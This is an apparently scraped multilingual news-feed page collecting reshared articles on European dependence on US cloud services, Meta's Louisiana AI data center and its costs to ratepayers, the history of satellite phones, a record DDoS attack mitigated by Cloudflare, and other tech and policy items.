Kill Switch! L’arma digitale di Donald Trump che minaccia l’Europa
Il ritorno di Donald Trump alla Casa Bianca è diventato un doloroso promemoria per l’Europa della sua principale vulnerabilità digitale: il “kill switch” di fatto controllato dagli Stati Uniti. Rischi politici che solo pochi anni fa sembravano una fantasia sono ora percepiti come una minaccia molto reale , in grado di paralizzare l’economia e le comunicazioni europee.
Nel corso degli anni di integrazione economica e globalizzazione tecnologica, i paesi europei sono diventati estremamente dipendenti dai servizi cloud americani. La sicurezza di e-mail, streaming video, elaborazione industriale e persino comunicazioni governative è direttamente collegata all’infrastruttura controllata dalle tre maggiori aziende americane: Amazon, Microsoft e Google. Queste aziende attualmente servono oltre due terzi del mercato cloud europeo.
Da tempo si esprimono preoccupazioni circa un’influenza indebita degli Stati Uniti sui dati europei. Le leggi americane consentono alle autorità statunitensi di accedere alle informazioni archiviate sui server di queste aziende in tutto il mondo. Ma da quando Trump è tornato al potere, tali scenari sono diventati molto più vicini alla realtà.
La situazione si è aggravata dopo che la Corte penale internazionale ha emesso mandati di arresto per importanti politici israeliani e al procuratore capo della Corte, Karim Khan, è stato impedito l’accesso ai suoi account di posta elettronica ospitati sui server Microsoft. Sebbene l’azienda stessa si sia rifiutata di divulgare i dettagli della chiusura, l’incidente ha suscitato grande scalpore. Aura Sallah, ex importante lobbista di Meta a Bruxelles e ora membro del Parlamento europeo, ha sottolineato che una situazione del genere dimostra chiaramente che l’affidabilità e la sicurezza delle piattaforme digitali americane per l’Europa sono seriamente in discussione.
Come ha osservato Zach Myers, direttore del think tank CERRE, l’Europa è un concorrente e un avversario per Trump, non un alleato. Pertanto, l’idea che le autorità americane possano deliberatamente disattivare i servizi cloud per aumentare la pressione politica non sembra più fantascienza.
In risposta al peggioramento della situazione, politici e aziende europee stanno intensificando gli sforzi per ridurre la dipendenza tecnologica dagli Stati Uniti. Il capo dell’azienda francese OVHcloud, Benjamin Revkolewski, ha paragonato i servizi cloud a un sistema di approvvigionamento idrico: familiare e impercettibile finché qualcuno non chiude la valvola. E se la possibilità di un simile blocco era precedentemente discussa in teoria, oggi è percepita come un rischio reale.
Per ridurre almeno in parte il grado di dipendenza, le più grandi aziende americane si sono affrettate a dimostrare la loro disponibilità al dialogo. Microsoft ha incluso garanzie legali nei contratti con le agenzie governative europee per mantenere l’accesso ai servizi, anche in caso di decisioni politiche da parte di Washington. Amazon ha annunciato un nuovo meccanismo per la gestione dei servizi europei, promettendo di garantirne il “funzionamento indipendente e continuo”, anche qualora gli Stati Uniti introducessero nuove restrizioni.
Eppure molti dubitano che tali promesse resisteranno alle pressioni della Casa Bianca. Come sottolinea l’economista Cristina Caffarra dell’University College di Londra, anche con le migliori intenzioni, le aziende non saranno in grado di tenere testa al proprio governo se il confronto politico raggiungerà un nuovo livello.
In questo contesto, nell’UE si stanno diffondendo richieste di creare infrastrutture digitali proprie e indipendenti. Una di queste iniziative è il progetto EuroStack, con un investimento previsto di 300 miliardi di euro. Il suo obiettivo è garantire la piena indipendenza dell’Europa nel campo delle tecnologie e del software cloud. Il piano prevede commesse governative prioritarie per le aziende IT locali, sussidi e un fondo di sostegno.
Ma l’ambizioso progetto sarà estremamente difficile da attuare. Come ammettono anche i suoi sostenitori, l’entità dell’investimento è paragonabile ai budget delle più grandi riforme infrastrutturali degli ultimi decenni. Gli scettici, compresi i rappresentanti delle lobby americane, sostengono che i costi reali potrebbero superare i 5 trilioni di euro.
I responsabili politici dell’UE si trovano a dover bilanciare il desiderio di sovranità tecnologica con il timore di essere accusati di protezionismo, che potrebbe innescare una dura risposta da parte degli Stati Uniti. Gli Stati membri sono divisi: la Francia è irremovibile sulla necessità di proteggere i dati dall’influenza americana, mentre i Paesi Bassi, tradizionalmente fedeli agli Stati Uniti, hanno in passato adottato una posizione più cauta. Tuttavia, le turbolenze politiche degli ultimi mesi hanno costretto anche loro a riconsiderare il loro approccio.
Il problema è aggravato dal fatto che le iniziative legislative volte a rafforzare la sovranità digitale sono bloccate. Uno dei progetti chiave, che prevede la certificazione obbligatoria delle soluzioni “cloud” per le agenzie governative, è bloccato in fase di approvazione. Secondo l’idea, il livello di certificazione più elevato avrebbe dovuto garantire la protezione dei dati da interferenze da parte di paesi terzi, inclusi gli Stati Uniti. Ma sotto la pressione di Washington, i negoziati si sono protratti a lungo e la Commissione europea si rifiuta di divulgare la corrispondenza con la parte americana, citando la “necessità di mantenere la fiducia”.
Nel frattempo, Bruxelles sta sempre più insistendo sulla necessità di una politica rigorosa e pragmatica. Come ammette Henna Virkkunen, responsabile del dipartimento UE per la sovranità tecnologica, l’Europa si trova per la prima volta di fronte a una situazione in cui la sua dipendenza economica e tecnologica può essere usata come arma nei conflitti internazionali.
La posta in gioco finanziaria, tecnologica e politica è altissima. L’Europa deve decidere se è disposta a pagare per l’indipendenza o se preferisce continuare a sperare che il passaggio all’estero non venga mai effettuato.
L'articolo Kill Switch! L’arma digitale di Donald Trump che minaccia l’Europa proviene da il blog della sicurezza informatica.
Giupardeb reshared this.
Automatisierte Datenanalyse: Sachsen-Anhalt will „interimsweise“ Palantir
netzpolitik.org/2025/automatis…
Details about how Meta's nearly Manhattan-sized data center will impact consumers' power bills are still secret.
Details about how Metax27;s nearly Manhattan-sized data center will impact consumersx27; power bills are still secret.#AI
'A Black Hole of Energy Use': Meta's Massive AI Data Center Is Stressing Out a Louisiana Community
A massive data center for Meta’s AI will likely lead to rate hikes for Louisiana customers, but Meta wants to keep the details under wraps.Holly Ridge is a rural community bisected by US Highway 80, gridded with farmland, with a big creek—it is literally named Big Creek—running through it. It is home to rice and grain mills and an elementary school and a few houses. Soon, it will also be home to Meta’s massive, 4 million square foot AI data center hosting thousands of perpetually humming servers that require billions of watts of energy to power. And that energy-guzzling infrastructure will be partially paid for by Louisiana residents.
The plan is part of what Meta CEO Mark Zuckerberg said would be “a defining year for AI.” On Threads, Zuckerberg boasted that his company was “building a 2GW+ datacenter that is so large it would cover a significant part of Manhattan,” posting a map of Manhattan along with the data center overlaid. Zuckerberg went on to say that over the coming years, AI “will drive our core products and business, unlock historic innovation, and extend American technology leadership. Let's go build! 💪”
Mark Zuckerberg (@zuck) on Threads
This will be a defining year for AI. In 2025, I expect Meta AI will be the leading assistant serving more than 1 billion people, Llama 4 will become the leading state of the art model, and we’ll build an AI engineer that will start contributing increasing amounts of code to our R&D efforts. To power this, Meta is building a 2GW+ datacenter that is so large it would cover a significant part of Manhattan.Threads
What Zuckerberg did not mention is that "Let's go build" refers not only to the massive data center but also three new Meta-subsidized, gas power plants and a transmission line to fuel it serviced by Entergy Louisiana, the region’s energy monopoly.Key details about Meta’s investments with the data center remain vague, and Meta’s contracts with Entergy are largely cloaked from public scrutiny. But what is known is the $10 billion data center has been positioned as an enormous economic boon for the area—one that politicians bent over backward to facilitate—and Meta said it will invest $200 million into “local roads and water infrastructure.”
A January report from NOLA.com said that the the state had rewritten zoning laws, promised to change a law so that it no longer had to put state property up for public bidding, and rewrote what was supposed to be a tax incentive for broadband internet meant to bridge the digital divide so that it was only an incentive for data centers, all with the goal of luring in Meta.
But Entergy Louisiana’s residential customers, who live in one of the poorest regions of the state, will see their utility bills increase to pay for Meta’s energy infrastructure, according to Entergy’s application. Entergy estimates that amount will be small and will only cover a transmission line, but advocates for energy affordability say the costs could balloon depending on whether Meta agrees to finish paying for its three gas plants 15 years from now. The short-term rate increases will be debated in a public hearing before state regulators that has not yet been scheduled.
The Alliance for Affordable Energy called it a “black hole of energy use,” and said “to give perspective on how much electricity the Meta project will use: Meta’s energy needs are roughly 2.3x the power needs of Orleans Parish … it’s like building the power impact of a large city overnight in the middle of nowhere.”
404 Media reached out to Entergy for comment but did not receive a response.
By 2030, Entergy’s electricity prices are projected to increase 90 percent from where they were in 2018, although the company attributes much of that to damage to infrastructure from hurricanes. The state already has a high energy cost burden in part because of a storm damage to infrastructure, and balmy heat made worse by climate change that drives air conditioner use. The state's homes largely are not energy efficient, with many porous older buildings that don’t retain heat in the winter or remain cool in the summer.
“You don't just have high utility bills, you also have high repair costs, you have high insurance premiums, and it all contributes to housing insecurity,” said Andreanecia Morris, a member of Housing Louisiana, which is opposed to Entergy’s gas plant application. She believes Meta’s data center will make it worse. And Louisiana residents have reasons to distrust Entergy when it comes to passing off costs of new infrastructure: in 2018, the company’s New Orleans subsidiary was caught paying actors to testify on behalf of a new gas plant. “The fees for the gas plant have all been borne by the people of New Orleans,” Morris said.
In its application to build new gas plants and in public testimony, Entergy says the cost of Meta’s data center to customers will be minimal and has even suggested Meta’s presence will make their bills go down. But Meta’s commitments are temporary, many of Meta’s assurances are not binding, and crucial details about its deal with Entergy are shielded from public view, a structural issue with state energy regulators across the country.
AI data centers are being approved at a breakneck pace across the country, particularly in poorer regions where they are pitched as economic development projects to boost property tax receipts, bring in jobs and where they’re offered sizable tax breaks. Data centers typically don’t hire many people, though, with most jobs in security and janitorial work, along with temporary construction work. And the costs to the utility’s other customers can remain hidden because of a lack of scrutiny and the limited power of state energy regulators. Many data centers—like the one Meta is building in Holly Ridge—are being powered by fossil fuels. This has led to respiratory illness and other health risks and emitting greenhouse gasses that fuel climate change. In Memphis, a massive data center built to launch a chatbot for Elon Musks’ AI company is powered by smog-spewing methane turbines, in a region that leads the state for asthma rates.
“In terms of how big these new loads are, it's pretty astounding and kind of a new ball game,” said Paul Arbaje, an energy analyst with the Union of Concerned Scientists, which is opposing Entergy’s proposal to build three new gas-powered plants in Louisiana to power Meta’s data center.
Entergy Louisiana submitted a request to the state’s regulatory body to approve the construction of the new gas-powered plants that would create 2.3 gigawatts of power and cost $3.2 billion in the 1440 acre Franklin Farms megasite in Holly Ridge, an unincorporated community of Richland Parish. It is the first big data center announced since Louisiana passed large tax breaks for data centers last summer.
In its application to the public utility commission for gas plants, Entergy says that Meta has a planned investment of $5 billion in the region to build the gas plants in Richland Parish, Louisiana, where it claims in its application that the data center will employ 300-500 people with an average salary of $82,000 in what it points out is “a region of the state that has long struggled with a lack of economic development and high levels of poverty.” Meta’s official projection is that it will employ more than 500 people once the data center is operational. Entergy plans for the gas plants to be online by December 2028.
In testimony, Entergy officials refused to answer specific questions about job numbers, saying that the numbers are projections based on public statements from Meta.
A spokesperson for Louisiana’s Economic Development told 404 Media in an email that Meta “is contractually obligated to employ at least 500 full-time employees in order to receive incentive benefits.”
When asked about jobs, Meta pointed to a public facing list of its data centers, many of which the company says employ more than 300 people. A spokesperson said that the projections for the Richland Parish site are based on the scale of the 4 million square foot data center. The spokesperson said the jobs will include “engineering and other technical positions to operational roles and our onsite culinary staff.”
When asked if its job commitments are binding, the spokesperson declined to answer, saying, “We worked closely with Richland Parish and Louisiana Economic Development on mutually beneficial agreements that will support long-term growth in the area.”
Others are not as convinced. “Show me a data center that has that level of employment,” says Logan Burke, executive director of the Alliance for Affordable Energy in Louisiana.
Entergy has argued the new power plants are necessary to satiate the energy need from Meta’s massive hyperscale data center, which will be Meta’s largest data center and potentially the largest data center in the United States. It amounts to a 25 percent increase in Entergy Louisiana’s current load, according to the Alliance for Affordable Energy.
Entergy requested an exemption from a state law meant to ensure that it develops energy at the lowest cost by issuing a public request for proposals, claiming in its application and testimony that this would slow them down and cause them to lose their contracts with Meta.
Meta has agreed to subsidize the first 15 years of payments for construction of the gas plants, but the plant’s construction is being financed over 30 years. At the 15 year mark, its contract with Entergy ends. At that point, Meta may decide it doesn’t need three gas plants worth of energy because computing power has become more efficient or because its AI products are not profitable enough. Louisiana residents would be stuck with the remaining bill.
“It's not that they're paying the cost, they're just paying the mortgage for the time that they're under contract,” explained Devi Glick, an electric utility analyst with Synapse Energy.
When asked about the costs for the gas plants, a Meta spokesperson said, “Meta works with our utility partners to ensure we pay for the full costs of the energy service to our data centers.” The spokesperson said that any rate increases will be reviewed by the Louisiana Public Service Commission. These applications, called rate cases, are typically submitted by energy companies based on a broad projection of new infrastructure projects and energy needs.
Meta has technically not finalized its agreement with Entergy but Glick believes the company has already invested enough in the endeavor that it is unlikely to pull out now. Other companies have been reconsidering their gamble on AI data centers: Microsoft reversed course on centers requiring a combined 2 gigawatts of energy in the U.S. and Europe. Meta swept in to take on some of the leases, according to Bloomberg.
And in the short-term, Entergy is asking residential customers to help pay for a new transmission line for the gas plants at a cost of more than $500 million, according to Entergy’s application to Louisiana’s public utility board. In its application, the energy giant said customers’ bills will only rise by $1.66 a month to offset the costs of the transmission lines. Meta, for its part, said it will pay up to $1 million a year into a fund for low-income customers. When asked about the costs of the new transmission line, a Meta spokesperson said, “Like all other new customers joining the transmission system, one of the required transmission upgrades will provide significant benefits to the broader transmission system. This transmission upgrade is further in distance from the data center, so it was not wholly assigned to Meta.”
When Entergy was questioned in public testimony on whether the new transmission line would need to be built even without Meta’s massive data center, the company declined to answer, saying the question was hypothetical.
Some details of Meta’s contract with Entergy have been made available to groups legally intervening in Entergy’s application, meaning that they can submit testimony or request data from the company. These parties include the Alliance for Affordable Energy, the Sierra Club and the Union of Concerned Scientists.
But Meta—which will become Entergy’s largest customer by far and whose presence will impact the entire energy grid—is not required to answer questions or divulge any information to the energy board or any other parties. The Alliance for Affordable Energy and Union of Concerned Scientists attempted to make Meta a party to Entergy’s application—which would have required it to share information and submit to questioning—but a judge denied that motion on April 4.
The public utility commissions that approve energy infrastructure in most states are the main democratic lever to assure that data centers don’t negatively impact consumers. But they have no oversight over the tech companies running the data centers or the private companies that build the centers, leaving residential customers, consumer advocates and environmentalists in the dark. This is because they approve the power plants that fuel the data centers but do not have jurisdiction over the data centers themselves.
“This is kind of a relic of the past where there might be some energy service agreement between some large customer and the utility company, but it wouldn't require a whole new energy facility,” Arbaje said.
A research paper by Ari Peskoe and Eliza Martin published in March looked at 50 regulatory cases involving data centers, and found that tech companies were pushing some of the costs onto utility customers through secret contracts with the utilities. The paper found that utilities were often parroting rhetoric from AI boosting politicians—including President Biden—to suggest that pushing through permitting for AI data center infrastructure is a matter of national importance.
“The implication is that there’s no time to act differently,” the authors wrote.
In written testimony sent to the public service commission, Entergy CEO Phillip May argued that the company had to bypass a legally required request for proposals and requirement to find the cheapest energy sources for the sake of winning over Meta.
“If a prospective customer is choosing between two locations, and if that customer believes that location A can more quickly bring the facility online than location B, that customer is more likely to choose to build at location A,” he wrote.
Entergy also argues that building new gas plants will in fact lower electricity bills because Meta, as the largest customer for the gas plants, will pay a disproportionate share of energy costs. Naturally, some are skeptical that Entergy would overcharge what will be by far their largest customer to subsidize their residential customers. “They haven't shown any numbers to show how that's possible,” Burke says of this claim. Meta didn’t have a response to this specific claim when asked by 404 Media.
Some details, like how much energy Meta will really need, the details of its hiring in the area and its commitment to renewables are still cloaked in mystery.
“We can't ask discovery. We can't depose. There's no way for us to understand the agreement between them without [Meta] being at the table,” Burke said.
It’s not just Entergy. Big energy companies in other states are also pushing out costly fossil fuel infrastructure to court data centers and pushing costs onto captive residents. In Kentucky, the energy company that serves the Louisville area is proposing 2 new gas plants for hypothetical data centers that have yet to be contracted by any tech company. The company, PPL Electric Utilities, is also planning to offload the cost of new energy supply onto its residential customers just to become more competitive for data centers.
“It's one thing if rates go up so that customers can get increased reliability or better service, but customers shouldn't be on the hook to pay for new power plants to power data centers,” Cara Cooper, a coordinator with Kentuckians for Energy Democracy, which has intervened on an application for new gas plants there.
These rate increases don’t take into account the downstream effects on energy; as the supply of materials and fuel are inevitably usurped by large data center load, the cost of energy goes up to compensate, with everyday customers footing the bill, according to Glick with Synapse.
Glick says Entergy’s gas plants may not even be enough to satisfy the energy needs of Meta’s massive data center. In written testimony, Glick said that Entergy will have to either contract with a third party for more energy or build even more plants down the line to fuel Meta’s massive data center.
To fill the gap, Entergy has not ruled out lengthening the life of some of its coal plants, which it had planned to close in the next few years. The company already pushed back the deactivation date of one of its coal plants from 2028 to 2030.
The increased demand for gas power for data centers has already created a widely-reported bottleneck for gas turbines, the majority of which are built by 3 companies. One of those companies, Siemens Energy, told Politico that turbines are “selling faster than they can increase manufacturing capacity,” which the company attributed to data centers.
Most of the organizations concerned about the situation in Louisiana view Meta’s massive data center as inevitable and are trying to soften its impact by getting Entergy to utilize more renewables and make more concrete economic development promises.
Andreanecia Morris, with Housing Louisiana, believes the lack of transparency from public utility commissions is a bigger problem than just Meta. “Simply making Meta go away, isn't the point,” Morris says. “The point has to be that the Public Service Commission is held accountable.”
Burke says Entergy owns less than 200 megawatts of renewable energy in Louisiana, a fraction of the fossil fuels it is proposing to fuel Meta’s center. Entergy was approved by Louisiana’s public utility commission to build out three gigawatts of solar energy last year , but has yet to build any of it.
“They're saying one thing, but they're really putting all of their energy into the other,” Burke says.
New gas plants are hugely troubling for the climate. But ironically, advocates for affordable energy are equally concerned that the plants will lie around disused - with Louisiana residents stuck with the financing for their construction and upkeep. Generative AI has yet to prove its profitability and the computing heavy strategy of American tech companies may prove unnecessary given less resource intensive alternatives coming out of China.
“There's such a real threat in such a nascent industry that what is being built is not what is going to be needed in the long run,” said Burke. “The challenge remains that residential rate payers in the long run are being asked to finance the risk, and obviously that benefits the utilities, and it really benefits some of the most wealthy companies in the world, But it sure is risky for the folks who are living right next door.”
The Alliance for Affordable Energy expects the commission to make a decision on the plants this fall.
Want to build a gas plant? Get in line. - E&E News by POLITICO
A program in Texas shows how political enthusiasm can’t escape the limits of the supply chain.Jason Plautz (E&E News by POLITICO)
Anti-Autokratie-Handbuch: 26 Werkzeuge zur Verteidigung der Demokratie
netzpolitik.org/2025/anti-auto…
Vi racconto cosa faremo in un mondo senza lavoro.
Consiglio la lettura...
Eulogy for the Satellite Phone
We take it for granted that we almost always have cell service, no matter where you go around town. But there are places — the desert, the forest, or the ocean — where you might not have cell service. In addition, there are certain jobs where you must be able to make a call even if the cell towers are down, for example, after a hurricane. Recently, a combination of technological advancements has made it possible for your ordinary cell phone to connect to a satellite for at least some kind of service. But before that, you needed a satellite phone.
On TV and in movies, these are simple. You pull out your cell phone that has a bulkier-than-usual antenna, and you make a call. But the real-life version is quite different. While some satellite phones were connected to something like a ship, I’m going to consider a satellite phone, for the purpose of this post, to be a handheld device that can make calls.
History
Satellites have been relaying phone calls for a very long time. Early satellites carried voice transmissions in the late 1950s. But it would be 1979 before Inmarsat would provide MARISAT for phone calls from sea. It was clear that the cost of operating a truly global satellite phone system would be too high for any single country, but it would be a boon for ships at sea.
Inmarsat, started as a UN organization to create a satellite network for naval operations. It would grow to operate 15 satellites and become a private British-based company in 1998. However, by the late 1990s, there were competing companies like Thuraya, Iridium, and GlobalStar.
For example, here was part of a press release for a 1989 satellite terminal:
…small enough to fit into a standard suitcase. The TCS-9200 satellite terminal weighs 70lb and can be used to send voice, facsimile and still photographs… The TCS-9200 starts at $53,000, while Inmarsat charges are $7 to $10 per minute.
Keep in mind, too, that in addition to the briefcase, you needed an antenna. If you were lucky, your antenna folded up and, when deployed, looked a lot like an upside-down umbrella.
However, Iridium launched specifically to bring a handheld satellite phone service to the market. The first call? In late 1998, U.S. Vice President Al Gore dialed Gilbert Grosvenor, the great-grandson of Alexander Graham Bell. The phones looked like very big “brick” phones with a very large antenna that swung out.
Of course, all of this was during the Cold War, so the USSR also had its own satellite systems: Volna and Morya, in addition to military satellites.
Location, Location, Location
The earliest satellites made one orbit of the Earth each day, which means they orbit at a very specific height. Higher orbits would cause the Earth to appear to move under the satellite, while lower orbits would have the satellite racing around the Earth.
That means that, from the ground, it looks like they never move. This gives reasonable coverage as long as you can “see” the satellite in the sky. However, it means you need better transmitters, receivers, and antennas.
This is how Inmarsat and Thuraya worked. Unless there is some special arrangement, a geosynchronous satellite only covers about 40% of the Earth.
Getting a satellite into a high orbit is challenging, and there are only so many “slots” at the exact orbit required to be geosynchronous available. That’s why other companies like Iridium and Globalstar wanted an alternative.
That alternative is to have satellites in lower orbits. It is easier to talk to them, and you can blanket the Earth. However, for full coverage of the globe, you need at least 40 or 50 satellites.
The system is also more complex. Each satellite is only overhead for a few minutes, so you have to switch between orbiting “cell towers” all the time. If there are enough satellites, it can be an advantage because you might get blocked from one satellite by, say, a mountain, and just pick up a different one instead.
Globalstar used 48 satellites, but couldn’t cover the poles. They eventually switched to a constellation of 24 satellites. Iridium, on the other hand, operates 66 satellites and claims to cover the entire globe. The satellites can beam signals to the Earth or each other.
The Problems
There are a variety of issues with most, if not all, satellite phones. First, geosynchronous satellites won’t work if you are too far North or South since the satellite will be so low, you’ll bump into things like trees and mountains. Of course, they don’t work if you are on the wrong side of the world, either, unless there is a network of them.
Getting a signal indoors is tricky. Sometimes, it is tricky outdoors, too. And this isn’t cheap. Prices vary, but soon after the release, phones started at around $1,300, and then you paid $7 a minute to talk. The geosynchronous satellites, in particular, are subject to getting blocked momentarily by just about anything. The same can happen if you have too few satellites in the sky above you.
Modern pricing is a bit harder to figure out because of all the different plans. However, expect to pay between $50 and $150 a month, plus per-minute charges ranging from $0.25 to $1.50 per minute. In general, networks with less coverage are cheaper than those that work everywhere. Text messages are extra. So, of course, is data.
If you want to see what it really looked like to use a 1990-era Iridium phone, check out [saveitforparts] video below.
youtube.com/embed/omerPV8CPZQ?…
If you prefer to see an older non-phone system, check him out with an even older Inmarsat station in this video:
youtube.com/embed/mOvUxoA7Ngs?…
So it is no wonder these never caught on with the mass market. We expect that if providers can link normal cell phones to a satellite network, these older systems will fall by the wayside, at least for voice communications. Or, maybe hacker use will get cheaper. We can hope, right?
SIRIA. Salito a 22 morti il bilancio dell’attentato suicida contro una chiesa
@Notizie dall'Italia e dal mondo
Si tratta del primo attentato di questo tipo contro i cristiani dalla caduta del presidente Bashar al-Assad a dicembre
L'articolo pagineesteri.it/2025/06/23/med…
Notizie dall'Italia e dal mondo reshared this.
Operazione Midnight Hammer, l’attacco Usa che cambia il Medio Oriente. L’analisi di Caruso
@Notizie dall'Italia e dal mondo
Nella notte tra sabato 21 e domenica 22 giugno 2025, gli Stati Uniti hanno compiuto un passo senza precedenti nella loro storia moderna: l’attacco diretto alle infrastrutture nucleari iraniane. L'”Operazione Midnight Hammer” rappresenta un
Notizie dall'Italia e dal mondo reshared this.
Videoüberwachung und Staatstrojaner: Berliner Landesregierung will Befugnisse der Polizei ausweiten
netzpolitik.org/2025/videouebe…
Cloudflare mitiga un attacco da 7,3 terabit al secondo. Immagina 9350 film in HD scaricati in 45 secondi
A metà maggio 2025, Cloudflare ha bloccato il più grande attacco DDoS mai registrato: ben 7,3 terabit al secondo (Tbps). Questo evento segue di poco la pubblicazione del report sulle minacce DDoS per il primo trimestre del 2025 avvenuta il 27 aprile 2025, in cui era stato evidenziato attacchi che raggiungevano i 6,5 Tbps e 4,8 miliardi di pacchetti al secondo (pps).
37,4 terabyte non sono una cifra sbalorditiva per le dimensioni odierne, ma scaricarne 37,4 terabyte in soli 45 secondi lo è.
Equivale a inondare la rete con oltre 9.350 film in HD o a guardare in streaming 7.480 ore di video ad alta definizione senza interruzioni (quasi un anno di maratona di visione di serie TV consecutive) in soli 45 secondi.
Se si trattasse di musica, scaricheresti circa 9,35 milioni di brani in meno di un minuto, abbastanza per tenere impegnato un ascoltatore per 57 anni di fila. Immagina di scattare 12,5 milioni di foto ad alta risoluzione con il tuo smartphone senza mai esaurire lo spazio di archiviazione: anche se ne scattassi una al giorno, staresti lì a cliccare per 4.000 anni, ma in 45 secondi.
L’attacco ha preso di mira un cliente di Cloudflare, un provider di hosting, che utilizza Magic Transit per difendere la propria rete IP. I provider di hosting e le infrastrutture Internet critiche sono sempre più spesso bersaglio di attacchi DDoS, come riportato nell’ultimo rapporto sulle minacce DDoS
L’immagine sottostante mostra una campagna di attacchi condotta tra gennaio e febbraio 2025, che ha sferrato oltre 13,5 milioni di attacchi DDoS contro l’infrastruttura di Cloudflare e i provider di hosting protetti da Cloudflare.
L’attacco ha colpito a tappeto una media di 21.925 porte di destinazione di un singolo indirizzo IP, con un picco di 34.517 porte di destinazione al secondo. L’attacco ha avuto origine anche da una distribuzione simile di porte sorgente.
L’attacco da 7,3 Tbps è stato un attacco DDoS multivettore. Circa il 99,996% del traffico dell’attacco è stato classificato come flood UDP. Tuttavia, il restante 0,004%, pari a 1,3 GB del traffico dell’attacco, è stato identificato come attacchi di riflessione QOTD, attacco di riflessione Echo, attacco di riflessione NTP, attacco di flood UDP Mirai, flood Portmap e attacchi di amplificazione RIP
L'articolo Cloudflare mitiga un attacco da 7,3 terabit al secondo. Immagina 9350 film in HD scaricati in 45 secondi proviene da il blog della sicurezza informatica.
L’UE indaga sull’acquisizione della piattaforma X di Elon Musk da parte di xAI
L'articolo proviene da #Euractiv Italia ed è stato ricondiviso sulla comunità Lemmy @Intelligenza Artificiale
La Commissione ha inviato una richiesta di informazioni ai sensi del regolamento online dell’UE, il Digital Services Act (DSA), al fine di chiarire la struttura
Intelligenza Artificiale reshared this.
Filomena Gallo partecipa alla proiezione del film “La stanza accanto”
L’avvocata Filomena Gallo, Segretaria nazionale dell’Associazione Luca Coscioni, partecipa al dibattito e alla proiezione del film La stanza accanto di Pedro Almodovar. La proiezione è organizzata da Rete dei Diritti, in collaborazione con Arianteo.
L’appuntamento è per mercoledì 9 luglio 2025 alle ore 20:45 a Palazzo Reale, a Milano.
Con Filomena Gallo partecipa anche Valeria Imbrogno, psicologa e compagna di DJ Fabo. Presenta e coordina Ilio Pacini Mannucci, magistrato del Tribunale di Milano. I biglietti sono acquistabili in loco.
L'articolo Filomena Gallo partecipa alla proiezione del film “La stanza accanto” proviene da Associazione Luca Coscioni.
Datenaustausch zwischen Behörden: Innenminister setzen Vertrauen bei der Behandlung psychischer Erkrankungen aufs Spiel
netzpolitik.org/2025/datenaust…
Earth’s Oxygen Levels and Magnetic Field Strength Show Strong Correlation
In an Earth-sized take on the age-old ‘correlation or causality’ question, researchers have come across a fascinating match between Earth’s magnetic field and its oxygen levels since the Cambrian explosion, about 500 million years ago. The full results by [Weijia Kuang] et al. were published in Science Advances, where the authors speculate that this high correlation between the geomagnetic dipole and oxygen levels as recorded in the Earth’s geological mineral record may be indicative of the Earth’s geological processes affecting the evolution of lifeforms in its biosphere.
As with any such correlation, one has to entertain the notion that said correlation might be spurious or indirectly related before assuming a strong causal link. Here it is for example known already that the solar winds affect the Earth’s atmosphere and with it the geomagnetic field, as more intense solar winds increase the loss of oxygen into space, but this does not affect the strength of the geomagnetic field, just its shape. The question is thus whether there is a mechanism that would affect this field strength and consequently cause the loss of oxygen to the solar winds to spike.
Here the authors suggest that the Earth’s core dynamics – critical to the geomagnetic field – may play a major role, with conceivably the core-mantle interactions over the course of millions of years affecting it. As supercontinents like Pangea formed, broke up and partially reformed again, the impact of this material solidifying and melting could have been the underlying cause of these fluctuations in oxygen and magnetic field strength levels.
Although hard to say at this point in time, it may very well be that this correlation is causal, albeit as symptoms of activity of the Earth’s core and liquid mantle.
What does the US want from tech?
IT'S MONDAY, AND THIS IS DIGITAL POLITICS. I'm Mark Scott, and here's a quick scheduling update. I'm taking the first two weeks off in July, so next week's newsletter will be the last until July 14.
Don't worry. I've got some programming planned for my upcoming break, but FYI.
— The United States is pursuing a "cake-and-eat-it" strategy on digital policymaking. It's leaving many confused, at home and abroad.
— The United Kingdom just passed the world's second mandate requiring social media companies to open up to outsiders in the name of accountability and transparency.
— Social media dominates how we all access information online. But artificial intelligence tools are likely to upend that status-quo.
Let's get started:
Un’Assemblea con 100 Costituenti per riscrivere le regole del gioco
@Politica interna, europea e internazionale
L'articolo Un’Assemblea con 100 Costituenti per riscrivere le regole del gioco proviene da Fondazione Luigi Einaudi.
Politica interna, europea e internazionale reshared this.
Cnil: le condizioni per il legittimo interesse nello sviluppo AI, focus sul web scraping
@Informatica (Italy e non Italy 😁)
L’Autorità garante per la protezione dei dati francese, Cnil, ha fornito le raccomandazioni sull’uso del legittimo interesse per lo sviluppo dei sistemi di AI, nel caso della raccolta di dati online. Ecco tutti i dettagli
Informatica (Italy e non Italy 😁) reshared this.
È disponibile il nuovo numero della newsletter del Ministero dell’Istruzione e del Merito.
Ministero dell'Istruzione
#NotiziePerLaScuola È disponibile il nuovo numero della newsletter del Ministero dell’Istruzione e del Merito.Telegram
Omicidi come un drink! Il dark web recluta ragazzini con App crittografate in Europa
In Europa sta prendendo piede una preoccupante tendenza criminale : bande criminali utilizzano app crittografate per reclutare adolescenti di appena 14 anni per commettere crimini violenti, tra cui omicidi su commissione.
Non si tratta di drammi polizieschi, ma di episodi reali in cui i giovani vengono coinvolti nel cosiddetto modello della “violenza come servizio“. Attraverso servizi di messaggistica sicura, i criminali offrono denaro per gli attacchi e i confini internazionali non sono più un ostacolo.
L’indagine, avviata dall’Autorità Nazionale Danese per i Reati Gravi con il supporto della polizia svedese, ha già portato ad arresti. Tra gli episodi chiave figura la sparatoria di Kokkedal del 7 maggio 2025. Sette persone di età compresa tra 14 e 26 anni sono state arrestate o si sono consegnate volontariamente alle autorità, tra cui residenti in Svezia e Marocco. Due diciottenni svedesi sono sospettati di reclutamento attivo: secondo gli inquirenti, avrebbero contribuito a organizzare i crimini e fornito armi e rifugi ai partecipanti.
In risposta alla minaccia, Europol ha attivato la task force internazionale OTF GRIMM, creata nell’aprile 2025. Ne fanno parte Danimarca, Svezia, Germania, Francia, Finlandia, Paesi Bassi e altri Paesi. L’obiettivo principale è quello di smascherare l’infrastruttura digitale attraverso cui vengono coordinati tali crimini.
Secondo il direttore del Centro europeo per la criminalità organizzata, le moderne reti criminali agiscono in modo pragmatico e cinico, delegando compiti pericolosi agli adolescenti e promettendo loro soldi facili.
Vale la pena notare che le applicazioni crittografate sono state a lungo utilizzate in altri schemi criminali. Ad esempio, nell’importante indagine internazionale sulla rete “764“, associata allo sfruttamento dei minori, anche i principali sospettati provenienti da Stati Uniti e Grecia hanno coordinato le loro azioni tramite messaggi anonimi.
